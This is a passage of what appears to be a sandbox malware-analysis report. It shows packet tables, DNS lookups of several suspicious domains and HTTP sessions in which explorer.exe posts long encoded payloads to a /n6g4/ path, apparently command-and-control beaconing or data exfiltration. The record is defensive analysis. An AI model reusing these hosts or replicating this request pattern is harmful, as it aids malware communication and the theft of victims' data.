May 14, 2022 15:30:41.015023947 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015083075 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015124083 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015161037 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015162945 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015204906 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015213966 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015222073 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015248060 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015288115 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015305042 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015330076 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015368938 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015383959 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015408993 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015446901 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015460968 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015487909 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015527964 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015536070 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015568018 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015609026 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.015614986 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.015748024 CEST	49799	80	192.168.2.4	38.34.163.59
May 14, 2022 15:30:41.145602942 CEST	80	49799	38.34.163.59	192.168.2.4
May 14, 2022 15:30:41.145679951 CEST	49799	80	192.168.2.4	38.34.163.59

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 14, 2022 15:30:03.737236977 CEST	60758	53	192.168.2.4	8.8.8.8
May 14, 2022 15:30:03.772979021 CEST	53	60758	8.8.8.8	192.168.2.4
May 14, 2022 15:30:16.340459108 CEST	64909	53	192.168.2.4	8.8.8.8
May 14, 2022 15:30:16.361342907 CEST	53	64909	8.8.8.8	192.168.2.4
May 14, 2022 15:30:22.352449894 CEST	60381	53	192.168.2.4	8.8.8.8
May 14, 2022 15:30:22.372586966 CEST	53	60381	8.8.8.8	192.168.2.4
May 14, 2022 15:30:28.201328039 CEST	56509	53	192.168.2.4	8.8.8.8
May 14, 2022 15:30:28.466856956 CEST	53	56509	8.8.8.8	192.168.2.4
May 14, 2022 15:30:33.866899014 CEST	54069	53	192.168.2.4	8.8.8.8
May 14, 2022 15:30:33.885291100 CEST	53	54069	8.8.8.8	192.168.2.4
May 14, 2022 15:30:39.638600111 CEST	58171	53	192.168.2.4	8.8.8.8
May 14, 2022 15:30:39.960573912 CEST	53	58171	8.8.8.8	192.168.2.4
May 14, 2022 15:30:45.995723963 CEST	56437	53	192.168.2.4	8.8.8.8
May 14, 2022 15:30:46.054826021 CEST	53	56437	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 14, 2022 15:30:03.737236977 CEST	192.168.2.4	8.8.8.8	0xf68b	Standard query (0)	www.dems-clicks.com	A (IP address)	IN (0x0001)
May 14, 2022 15:30:16.340459108 CEST	192.168.2.4	8.8.8.8	0x6722	Standard query (0)	www.jamesreadtanusa.com	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.352449894 CEST	192.168.2.4	8.8.8.8	0x1c1b	Standard query (0)	www.kickball.site	A (IP address)	IN (0x0001)
May 14, 2022 15:30:28.201328039 CEST	192.168.2.4	8.8.8.8	0x622e	Standard query (0)	www.bldh45.xyz	A (IP address)	IN (0x0001)
May 14, 2022 15:30:33.866899014 CEST	192.168.2.4	8.8.8.8	0x91eb	Standard query (0)	www.properscooter.com	A (IP address)	IN (0x0001)
May 14, 2022 15:30:39.638600111 CEST	192.168.2.4	8.8.8.8	0x5730	Standard query (0)	www.uspplongee.com	A (IP address)	IN (0x0001)
May 14, 2022 15:30:45.995723963 CEST	192.168.2.4	8.8.8.8	0x304c	Standard query (0)	www.zeavd.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 14, 2022 15:30:03.772979021 CEST	8.8.8.8	192.168.2.4	0xf68b	No error (0)	www.dems-clicks.com		5.183.8.183	A (IP address)	IN (0x0001)
May 14, 2022 15:30:16.361342907 CEST	8.8.8.8	192.168.2.4	0x6722	No error (0)	www.jamesreadtanusa.com		35.209.127.155	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	www.kickball.site	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
May 14, 2022 15:30:22.372586966 CEST	8.8.8.8	192.168.2.4	0x1c1b	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
May 14, 2022 15:30:28.466856956 CEST	8.8.8.8	192.168.2.4	0x622e	No error (0)	www.bldh45.xyz		35.241.47.216	A (IP address)	IN (0x0001)
May 14, 2022 15:30:33.885291100 CEST	8.8.8.8	192.168.2.4	0x91eb	No error (0)	www.properscooter.com	properscooter.com		CNAME (Canonical name)	IN (0x0001)
May 14, 2022 15:30:33.885291100 CEST	8.8.8.8	192.168.2.4	0x91eb	No error (0)	properscooter.com		198.54.116.236	A (IP address)	IN (0x0001)
May 14, 2022 15:30:39.960573912 CEST	8.8.8.8	192.168.2.4	0x5730	No error (0)	www.uspplongee.com	a6.pingcache.com		CNAME (Canonical name)	IN (0x0001)
May 14, 2022 15:30:39.960573912 CEST	8.8.8.8	192.168.2.4	0x5730	No error (0)	a6.pingcache.com		38.34.163.59	A (IP address)	IN (0x0001)
May 14, 2022 15:30:46.054826021 CEST	8.8.8.8	192.168.2.4	0x304c	No error (0)	www.zeavd.com	vip.myshopline.shop		CNAME (Canonical name)	IN (0x0001)
May 14, 2022 15:30:46.054826021 CEST	8.8.8.8	192.168.2.4	0x304c	No error (0)	vip.myshopline.shop		104.17.232.29	A (IP address)	IN (0x0001)
May 14, 2022 15:30:46.054826021 CEST	8.8.8.8	192.168.2.4	0x304c	No error (0)	vip.myshopline.shop		104.17.233.29	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.dems-clicks.com

www.jamesreadtanusa.com

www.kickball.site

www.bldh45.xyz

www.properscooter.com

www.uspplongee.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49768	5.183.8.183	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:03.920893908 CEST	1252	OUT	GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1 Host: www.dems-clicks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 14, 2022 15:30:04.548072100 CEST	1253	IN	HTTP/1.1 404 Not Found Date: Sat, 14 May 2022 13:30:03 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 281 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49774	35.209.127.155	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:16.495182991 CEST	7586	OUT	POST /n6g4/ HTTP/1.1 Host: www.jamesreadtanusa.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.jamesreadtanusa.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.jamesreadtanusa.com/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49785	198.54.116.236	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:34.060062885 CEST	9286	OUT	POST /n6g4/ HTTP/1.1 Host: www.properscooter.com Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.properscooter.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.properscooter.com/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 4d 63 72 58 76 50 6c 39 44 31 61 41 74 71 5a 4c 36 5a 4f 71 77 51 61 46 76 46 6d 52 54 51 73 63 59 70 53 5a 4c 4e 54 6d 51 5a 53 5a 4b 47 37 6d 62 59 79 45 76 79 6e 74 35 74 4b 61 70 61 4b 71 69 6b 45 66 58 46 53 6d 49 73 68 71 4b 7a 47 44 36 4b 4c 68 35 37 58 35 31 2d 53 6b 63 6d 75 39 37 39 61 63 76 45 56 42 57 48 57 4d 76 6c 74 79 78 6b 71 4a 70 73 4d 68 75 75 51 6e 76 72 63 54 39 69 52 55 32 64 62 6d 76 54 4a 35 7e 4d 6d 46 74 39 41 37 47 32 74 53 46 61 6b 78 58 63 43 31 4c 61 4c 42 58 6b 7a 48 4c 58 76 50 44 57 56 38 69 59 34 6e 30 41 75 4e 6d 65 74 49 6c 7a 4a 69 4d 61 56 73 48 5a 58 50 43 48 7e 35 64 38 52 35 65 75 4b 47 6d 76 64 41 72 42 28 59 30 72 67 47 4c 50 58 65 4f 4c 39 78 63 57 4c 43 28 49 4c 37 4d 71 49 78 64 62 38 70 6b 6f 65 5a 6f 5f 6b 4b 63 72 77 45 28 54 75 38 6d 38 74 38 4c 2d 65 5f 52 6f 43 64 5a 72 78 6b 59 53 68 42 28 30 68 63 52 4a 73 74 45 59 4f 37 67 42 39 32 42 6e 61 65 45 6e 76 2d 45 34 78 5a 38 45 64 5a 72 52 74 72 37 69 6c 36 39 4f 33 73 44 67 58 58 67 4b 73 4e 41 4d 79 50 62 31 57 71 73 55 7e 55 32 4f 65 62 42 51 64 5a 76 4b 45 56 46 68 31 63 54 70 6c 55 36 44 54 47 33 48 76 31 74 77 37 6e 50 6b 69 64 41 36 79 5f 73 65 78 77 50 34 53 55 59 39 68 49 48 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=McrXvPl9D1aAtqZL6ZOqwQaFvFmRTQscYpSZLNTmQZSZKG7mbYyEvynt5tKapaKqikEfXFSmIshqKzGD6KLh57X51-Skcmu979acvEVBWHWMvltyxkqJpsMhuuQnvrcT9iRU2dbmvTJ5~MmFt9A7G2tSFakxXcC1LaLBXkzHLXvPDWV8iY4n0AuNmetIlzJiMaVsHZXPCH~5d8R5euKGmvdArB(Y0rgGLPXeOL9xcWLC(IL7MqIxdb8pkoeZo_kKcrwE(Tu8m8t8L-e_RoCdZrxkYShB(0hcRJstEYO7gB92BnaeEnv-E4xZ8EdZrRtr7il69O3sDgXXgKsNAMyPb1WqsU~U2OebBQdZvKEVFh1cTplU6DTG3Hv1tw7nPkidA6y_sexwP4SUY9hIHg).
May 14, 2022 15:30:34.233189106 CEST	9287	IN	HTTP/1.1 400 Bad request content-length: 90 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49786	198.54.116.236	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 14, 2022 15:30:34.235141993 CEST	9300	OUT	POST /n6g4/ HTTP/1.1 Host: www.properscooter.com Connection: close Content-Length: 36477 Cache-Control: no-cache Origin: http://www.properscooter.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.properscooter.com/n6g4/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 33 66 65 3d 4d 63 72 58 76 4f 4a 56 48 45 48 51 6f 36 55 64 35 76 43 45 37 41 4b 48 74 31 71 55 5a 79 70 45 50 34 44 39 57 5a 58 66 43 4a 36 66 4f 79 6a 48 52 5f 65 6d 76 7a 57 44 77 2d 7e 57 36 4b 4f 72 69 6b 63 41 58 46 57 6d 4c 73 5a 36 4a 55 44 6f 39 73 33 67 36 62 57 63 30 2d 54 69 59 6b 62 79 37 39 65 45 76 48 30 61 57 33 36 4d 7e 32 56 79 6d 7a 57 30 6b 73 4d 37 6e 4f 42 34 77 37 41 64 39 69 5a 4d 32 59 6a 6d 36 7a 46 35 28 6f 69 45 6b 65 34 34 4c 47 74 58 51 71 6c 6e 65 38 65 66 4c 62 28 6a 58 6b 50 48 4c 6c 62 50 46 47 31 38 79 37 41 6d 28 51 75 56 73 2d 73 58 79 6a 31 33 4d 61 4a 67 48 63 6d 79 43 32 4b 35 66 4d 52 30 62 5f 54 37 71 63 6c 58 34 51 62 76 30 72 6b 5f 4c 61 33 57 4f 4a 70 52 61 6c 54 70 78 4b 54 52 4d 76 35 55 52 62 38 6c 38 34 66 62 6f 5f 6b 4d 63 72 77 6d 28 51 47 38 6d 5f 4e 38 45 39 57 5f 58 49 43 65 51 37 78 39 53 79 68 61 75 6b 73 51 52 4a 30 54 45 63 53 42 67 30 39 32 62 57 71 65 4d 67 37 78 4f 34 78 6c 71 30 64 65 76 52 74 65 37 69 6b 74 39 50 32 6e 43 54 7a 58 67 66 59 4e 43 5a 6d 50 64 46 57 71 6a 30 7e 53 28 75 69 4c 42 55 78 64 76 4b 30 5f 45 53 35 63 64 62 42 55 36 6e 6e 47 6b 6e 76 31 68 51 36 46 4a 31 58 30 43 4c 69 79 28 65 5a 4e 53 39 7a 71 64 5f 49 47 57 56 4a 6b 61 5f 66 79 69 57 4c 6d 4b 7a 64 2d 59 73 30 5f 6d 70 61 30 71 4f 62 47 36 46 4a 48 48 68 66 5f 61 5a 7e 71 38 67 68 42 6b 4d 39 49 77 62 49 71 75 39 52 63 56 73 6f 68 55 77 58 4a 41 53 4b 6a 47 42 41 62 63 61 7a 48 4f 5f 44 49 54 55 35 31 73 64 5a 31 4d 44 39 69 78 74 63 39 58 5f 42 52 73 68 42 51 67 6b 74 34 74 65 56 7a 45 47 54 54 5a 77 44 58 43 54 28 77 7e 48 71 74 67 68 57 48 64 42 6a 72 7e 53 4f 5a 6c 70 35 6e 41 57 34 71 34 44 5a 53 50 47 54 76 63 6a 6b 67 6a 6f 67 59 62 53 4c 72 79 61 35 61 55 37 6a 78 54 51 39 44 46 51 44 44 35 67 69 51 47 6e 47 6b 52 7a 6a 73 50 4e 4a 4a 6f 79 51 61 50 54 45 57 44 75 46 46 4c 6f 30 75 78 5f 28 4f 6d 33 47 4e 56 7a 77 4b 43 33 49 36 79 54 45 6f 34 30 73 68 7e 6a 69 4e 37 4f 4c 67 4c 6b 6b 47 47 68 79 44 62 65 69 70 74 71 58 74 6b 76 48 76 6e 52 48 4e 46 44 4c 6c 32 70 63 74 49 52 7a 4e 32 70 64 56 6d 6f 4b 50 37 45 50 4d 69 44 63 50 30 62 73 66 71 6f 45 63 64 69 4c 5f 57 6c 47 66 75 4f 6e 55 49 53 6e 71 7a 61 7a 63 6f 48 41 74 48 4b 5a 32 55 48 54 50 79 79 6b 4b 7e 45 7a 64 30 4c 34 5f 4a 59 41 6d 43 58 45 37 55 59 47 4c 72 72 69 38 6a 31 53 65 55 5a 37 61 74 54 73 4d 5a 61 58 34 67 67 4e 4c 6b 54 46 57 37 46 58 49 6b 61 74 5a 6d 79 6c 6f 45 71 62 64 54 5a 43 44 39 46 53 57 6c 62 7a 70 41 78 44 58 76 50 74 47 67 38 6f 6e 47 46 46 79 51 4f 61 39 55 6a 49 63 56 71 55 2d 59 69 52 73 6c 44 6b 59 4c 53 57 32 7a 61 76 52 75 37 38 32 51 79 46 65 77 4f 59 67 4f 35 4f 35 56 6a 69 50 4f 6f 47 44 45 6a 79 72 65 42 56 38 77 52 74 6f 6d 47 58 51 7e 4d 7a 34 30 53 4c 6e 33 34 6e 33 6d 56 43 41 43 30 63 53 42 68 71 58 4e 50 77 41 72 32 4b 36 64 31 68 79 75 6f 4f 57 39 4d 54 35 78 30 63 4b 54 61 52 76 59 4f 30 30 28 44 44 64 35 33 47 6a 37 75 45 50 73 61 48 6f 50 4c 58 4e 36 2d 4a 66 52 44 77 63 66 32 5a 70 58 38 74 4f 41 78 35 35 6c 34 69 75 41 33 64 70 28 78 6d 46 4e 56 58 6a 41 4d 6b 59 7e 62 42 31 79 72 33 66 37 66 31 44 4c 71 38 52 63 35 38 42 4c 6d 6c 47 79 76 50 46 63 59 58 49 38 76 74 33 62 47 38 33 52 49 4c 78 4a 70 53 59 64 32 36 44 4f 39 75 42 55 79 75 72 7e 4e 4c 39 4e 6d 31 59 43 64 50 51 4a 72 77 35 79 64 71 48 78 4a 7e 32 6e 6c 68 37 76 31 50 43 7a 45 67 62 43 68 6a 76 6e 4e 72 4c 51 72 69 71 69 52 62 61 66 6f 70 6d 6c 79 59 49 6c 38 6e 77 4a 34 55 6b 75 70 6d 74 64 49 5a 69 45 74 28 47 31 51 66 71 6f 64 31 4e 4f 34 32 49 28 56 7a 41 59 77 63 43 71 6a 6c 59 48 35 64 67 37 56 33 4a 39 6f 67 34 53 4c 6b 4a 70 4a 68 39 68 4d 68 68 48 37 63 44 46 6a 75 66 51 4a 44 68 4f 50 78 7a 6a 4c 35 69 37 69 75 43 7e 4a 68 5f 36 59 54 39 38 68 53 50 45 77 36 51 75 39 31 67 6a 6f 61 72 55 6e 71 4d 48 5a 64 73 34 31 62 48 43 66 6d 74 6d 52 56 6f 6e 46 70 6f 65 55 33 64 4d 6b 53 6f 4c 30 54 67 6c 59 68 58 76 4b 5a 62 61 36 64 53 4e 37 33 53 7a 68 74 6d 37 54 71 6e 70 47 34 49 37 74 47 70 75 39 6b 46 46 44 63 31 69 45 4a 64 63 4f 5a 62 50 66 68 68 67 4e 7a 69 64 38 61 50 48 38 41 4b 4a 53 63 Data Ascii: 3fe=McrXvOJVHEHQo6Ud5vCE7AKHt1qUZypEP4D9WZXfCJ6fOyjHR_emvzWDw-~W6KOrikcAXFWmLsZ6JUDo9s3g6bWc0-TiYkby79eEvH0aW36M~2VymzW0ksM7nOB4w7Ad9iZM2Yjm6zF5(oiEke44LGtXQqlne8efLb(jXkPHLlbPFG18y7Am(QuVs-sXyj13MaJgHcmyC2K5fMR0b_T7qclX4Qbv0rk_La3WOJpRalTpxKTRMv5URb8l84fbo_kMcrwm(QG8m_N8E9W_XICeQ7x9SyhauksQRJ0TEcSBg092bWqeMg7xO4xlq0devRte7ikt9P2nCTzXgfYNCZmPdFWqj0~S(uiLBUxdvK0_ES5cdbBU6nnGknv1hQ6FJ1X0CLiy(eZNS9zqd_IGWVJka_fyiWLmKzd-Ys0_mpa0qObG6FJHHhf_aZ~q8ghBkM9IwbIqu9RcVsohUwXJASKjGBAbcazHO_DITU51sdZ1MD9ixtc9X_BRshBQgkt4teVzEGTTZwDXCT(w~HqtghWHdBjr~SOZlp5nAW4q4DZSPGTvcjkgjogYbSLrya5aU7jxTQ9DFQDD5giQGnGkRzjsPNJJoyQaPTEWDuFFLo0ux_(Om3GNVzwKC3I6yTEo40sh~jiN7OLgLkkGGhyDbeiptqXtkvHvnRHNFDLl2pctIRzN2pdVmoKP7EPMiDcP0bsfqoEcdiL_WlGfuOnUISnqzazcoHAtHKZ2UHTPyykK~Ezd0L4_JYAmCXE7UYGLrri8j1SeUZ7atTsMZaX4ggNLkTFW7FXIkatZmyloEqbdTZCD9FSWlbzpAxDXvPtGg8onGFFyQOa9UjIcVqU-YiRslDkYLSW2zavRu782QyFewOYgO5O5VjiPOoGDEjyreBV8wRtomGXQ~Mz40SLn34n3mVCAC0cSBhqXNPwAr2K6d1hyuoOW9MT5x0cKTaRvYO00(DDd53Gj7uEPsaHoPLXN6-JfRDwcf2ZpX8tOAx55l4iuA3dp(xmFNVXjAMkY~bB1yr3f7f1DLq8Rc58BLmlGyvPFcYXI8vt3bG83RILxJpSYd26DO9uBUyur~NL9Nm1YCdPQJrw5ydqHxJ~2nlh7v1PCzEgbChjvnNrLQriqiRbafopmlyYIl8nwJ4UkupmtdIZiEt(G1Qfqod1NO42I(VzAYwcCqjlYH5dg7V3J9og4SLkJpJh9hMhhH7cDFjufQJDhOPxzjL5i7iuC~Jh_6YT98hSPEw6Qu91gjoarUnqMHZds41bHCfmtmRVonFpoeU3dMkSoL0TglYhXvKZba6dSN73Szhtm7TqnpG4I7tGpu9kFFDc1iEJdcOZbPfhhgNzid8aPH8AKJScEmY22QNocEMr1QWGNHV9ONBRdfnyzM7afLkrGpDozETPUQJYYmjz_1RjpCKxzlN741fUlbgI4NlyvBqUQ1uOf~KHxdb9m~LUSpoVZSo8JHQlKFGLzenw5mw4eisw2QllG2ZGEXnKJpqs9POGE5xfLsMHTS6PSutC41mnomNoA7snD8OZSXsjCgKjcoUMkPeezr4wda-fI060xnuAyBlHKNYSAJbB2eal9oysbyX8_gOKsj5V8FWksUL6PZywP9AN9EMWwL8xn~JtRiLAEHic1a7t3LPkpi0G6cfcEqOIyVvyCL6X5nWGUYOCxLDjxon9yspnGRdR559Bvwvj_agYgOLCgO56CYohAzadQyLR6FgGRnPO4Lxfq3H5CWVGb4LF7bqkBn_AKxguOAY(fIrVZyehz2acZdIO-Dn4st5nzsm3rRHkpV5cEqCCRkgS3wqXdGjL4o-v_hB3VvqMJckcSgNJPagx7nJms9KvBKn3s697P49vRhWPVymhBahCnFNFzKnFVT9JVBmxxmm5bfkf6nkYoXV2eusBchWQ8DYaFy2NV6imNreqP17bO6nru3Ijd9cOcNJ1qYOAfUaAX3IHbngBEsbVNBk28~N0lU8TWGNh6HhpkkdBtF9yzfgIN5WUbzz1sVJ4AnLMAnk22(U35c-CakV1S2bRzJgtbVsdTR1r0gaQwSGeF84B9UpRmYFpx4i9WDoLNbmDBKlW_INs0rUnCyK4570ufk_WCcUOtxms_~A~99O927a6z1CzRc4aNwRcD7WbTLRxPcYpGc7~LvA0ohP1vKfhi6AvNg5~ryA4Y~P(S3GYeApo-5oHgHX4epOTbMAs0T7yD7eJkFCKBcUlkA0EiVhPGR0RaSsG_VFvtsE7S1FhrU3Kurb0MyxOjRRHB0sl40DRrmXJrfKIfxQUoZ7XEcdKG60Tf0o5FRaxRwezt4WQSQ4uwiXV01U70bw2N2VHkKshnvf3K5Ap4vNZ2YmQRkCfLftC6BFDrc0lbgk4EHR~gHmVVotlS0PkutkRYkVKOpW5HwunP(4dwAq9-369EGrlpV0JkDu81t5RZP-~Qbl8q5zZIZB7bxYfYvtoJEm4pFP93nJ6j7wBCfsMZQaShLlLfEWIYLTh4(4B8mCxAyPvimoShawrCkGDNkuqyGxFWncsRiiu1T6braS(KL0h_h5M8p-DVELy6YxCF3WL80VoI7OdtjUWnxv(ykaUk0ajOhOFucPhEO3U5oFdBqlHaR1RAr7GWs7EZnfoa6F3b1ILW7yHhPRmGsOIlMGpMwL~6wWsdKw3-bVCnFhgmKN9r3shI0dd_8Zq2~ovJJcZCUMeaIn0oLhuS9oaROJXdDETRonJueojfxPbxwNmp877Wt7(AJZlAgdcw7-9GV39v4m0_kyECWhHPF528f1D4km549NC8Ftm9hkKQH2o9eZ0AcFLIVMPbCpw461E1w1XsrbEgpTyoLirzJfGDZYoCfITLR9bRV_r0ojgDpiayndtSylWV988W0TYo6TlFZP2UghxnoN4